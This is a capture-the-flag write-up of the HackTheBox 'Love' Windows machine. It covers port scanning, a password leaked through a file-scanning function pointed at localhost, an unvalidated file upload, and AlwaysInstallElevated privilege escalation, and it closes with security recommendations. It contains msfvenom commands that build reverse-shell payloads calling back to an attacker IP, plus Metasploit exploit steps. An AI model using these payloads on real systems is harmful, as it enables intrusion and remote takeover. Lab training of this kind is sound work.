Love 10.10.10.239
You could claim that anything's real if the only basis for believing in it is that nobody's proved it doesn't exist! <J.K. Rowling>
Completed on 30 May 2021

Background

Love is a Windows machine from HackTheBox that focuses on the enumeration technique for training your ethical hacking skills and penetration testing skills.
One of the system function allows the hacker to read the file content of the provided website that I can obtain the system login credential with administrative rights. After login to the application, the file upload function does not enforce the input validation checking, the exploitable script file can upload to the server and run to obtain the initial foothold.
No anti-virus software installed on this Windows machine, I can run the privilege escalation script without restriction and find an AlwaysInstallEvevated loophole. The administrative rights access obtained and read the secure flag.
Target Machine: 10.10.10.239
Attacker Machine: 10.10.14.3

Hacking Process Part 0 – Service Scanning

Quick Pre-searching

    1.
    nmap -p- -T5 --min-rate=1000 10.10.10.239 -oG fkclai.nmap
    2.
    nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.239 -o nmap-result.txt
1
# Nmap 7.80 scan initiated Mon May 24 23:38:44 2021 as: nmap -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670, -sC -sV -o nmap-result.txt 10.10.10.239
2
Nmap scan report for staging.love.htb (10.10.10.239)
3
Host is up (0.36s latency).
4
5
PORT STATE SERVICE VERSION
6
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
7
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
8
|_http-title: Secure file scanner
9
135/tcp open msrpc Microsoft Windows RPC
10
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
11
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
12
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
13
|_http-title: 403 Forbidden
14
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
15
| Not valid before: 2021-01-18T14:00:16
16
|_Not valid after: 2022-01-18T14:00:16
17
|_ssl-date: TLS randomness does not represent time
18
| tls-alpn:
19
|_ http/1.1
20
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
21
3306/tcp open mysql?
22
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
23
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
24
|_http-title: 403 Forbidden
25
5040/tcp open unknown
26
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
27
|_http-server-header: Microsoft-HTTPAPI/2.0
28
|_http-title: Not Found
29
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
30
|_http-server-header: Microsoft-HTTPAPI/2.0
31
|_http-title: Not Found
32
| ssl-cert: Subject: commonName=LOVE
33
| Subject Alternative Name: DNS:LOVE, DNS:Love
34
| Not valid before: 2021-04-11T14:39:19
35
|_Not valid after: 2024-04-10T14:39:19
36
|_ssl-date: 2021-05-24T16:08:18+00:00; +26m29s from scanner time.
37
| tls-alpn:
38
|_ http/1.1
39
7680/tcp open pando-pub?
40
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
41
|_http-server-header: Microsoft-HTTPAPI/2.0
42
|_http-title: Not Found
43
49664/tcp open msrpc Microsoft Windows RPC
44
49665/tcp open msrpc Microsoft Windows RPC
45
49666/tcp open msrpc Microsoft Windows RPC
46
49667/tcp open msrpc Microsoft Windows RPC
47
49668/tcp open msrpc Microsoft Windows RPC
48
49669/tcp open msrpc Microsoft Windows RPC
49
49670/tcp open msrpc Microsoft Windows RPC
50
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
51
52
Host script results:
53
|_clock-skew: mean: 2h11m29s, deviation: 3h30m01s, median: 26m28s
54
| smb-os-discovery:
55
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
56
| OS CPE: cpe:/o:microsoft:windows_10::-
57
| Computer name: Love
58
| NetBIOS computer name: LOVE\x00
59
| Workgroup: WORKGROUP\x00
60
|_ System time: 2021-05-24T09:08:00-07:00
61
| smb-security-mode:
62
| account_used: <blank>
63
| authentication_level: user
64
| challenge_response: supported
65
|_ message_signing: disabled (dangerous, but default)
66
| smb2-security-mode:
67
| 2.02:
68
|_ Message signing enabled but not required
69
| smb2-time:
70
| date: 2021-05-24T16:08:03
71
|_ start_date: N/A
72
73
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
74
# Nmap done at Mon May 24 23:41:50 2021 -- 1 IP address (1 host up) scanned in 186.41 seconds
75
Copied!
Enumeration strategies According to the Nmap result, the target machine is a Windows 10 Pro PC. It is a standard PC that installed the Apache Server. The interesting ports are two Apache port 80 and 5000. Apache is the primary enumeration target.

Hacking Process Part 1 – Enumeration

Web Enumeration

According to the Nmap result, the host's name below will be added to the host table and point to the IP 10.10.10.239.
    1.
    SSL-cert : staging.love.htb
    2.
    IIS host: www.love.htb
As no user-id found, the brute-force attack does not work on the Voting System. In addition, no product information or vulnerability was found on this website. I move the checking to the staging.love.htb.
One of the functions provided by this website is scanning the content of files. Due to access restriction of the outside host, after several tries, a password is returned by submitting the localhost address with the port 5000 that is one of the opened port at the Apache server.
Using this captured password to log in to the website www.love.htb but failure. After reviewing the dirb's result, another administrative page can be login with this password.
1
dirb http://10.10.10.239/ /usr/share/wordlists/dirb/common.txt -o dirb-239.result
Copied!

Hacking Process Part 2 – Initial Low Privilege Access

Reviewed the website, this PHP website provides an upload function that can upload any kinds of file without input validation, and the uploaded file can access at http://10.10.10.239/images/.
Uploaded a PHP file that helping to navigate the system. The user flag found at a file saved on the phoebe desktop. A revered shell script was prepared and uploaded to the server.
1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.12.3 LPORT=1234 -f exe -o fkclai.exe
Copied!
A reversed TCP shell obtained, and the user flag found at the user's desktop.

Hacking Process Part 3 – Privilege Escalation

The Privilege Escalation (PE) enumeration for the windows environment can use the tool winPEASx86.exe. This WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained in book.hacktricks.xyz
The result shows that this windows environment can exploit by the AlwaysInstallEvevated. This vulnerability allows a hacker to add the current login user to load the administrative group.
Windows Privilege Escalation (AlwaysInstallElevated)
Hacking Articles

Exploit using Metasploit Framework

Prepared a reverse shell script and uploaded it to the server.
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f exe -o msf-fkclai.exe
Copied!
Started the msfconsole and set the payload to the windows/meterpreter/reverse_tcp
Executed the uploaded script to obtain the low privilege shell
Use the exploit payload exploit/windows/local/always_install_elevated and set the following parameters.
1
msf5> use exploit/windows/local/always_install_elevated
2
msf5 exploit(always_install_elevated) > set session 1
3
msf5 exploit(always_install_elevated) > set LHOST 10.10.14.3
4
msf5 exploit(always_install_elevated) > set LPORT 1234
5
msf5 exploit(always_install_elevated) > exploit
Copied!
Exploited and got the administrative privilege access account.

Post Exploitation

1
Hostname: Love
2
ProductName: Windows 10 Enterprise
3
EditionID: Enterprise
4
ReleaseId: 2009
5
BuildBranch: vb_release
6
CurrentMajorVersionNumber: 10
7
CurrentVersion: 6.3
8
Architecture: x86
9
ProcessorCount: 2
10
SystemLang: en-US
11
KeyboardLang: English (United States)
12
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
13
IsVirtualMachine: True
14
Current Time: 5/30/2021 7:19:23 AM
15
HighIntegrity: False
16
PartOfDomain: False
17
Hotfixes: KB4601554, KB4562830, KB4570334, KB4577586, KB4580325, KB4586864, KB4589212, KB5000802, KB5000858,
18
19
Copied!

Recommendation

Missing the input validation is the major reason to obtain the initial foothold that I can upload any kinds of exploitable scripts and run them on the server. I would like to suggest the following actions to improve the security
    1.
    Restrict the access of internal files, especially the file that contains the system password.
    2.
    Improve the input validation to prevent any non-image format file upload.
    3.
    Enforce the system hardening to prevent any type of the Windows privilege escalation

Reference Links

Windows Privilege Escalation (AlwaysInstallElevated)
Hacking Articles
Last modified 4mo ago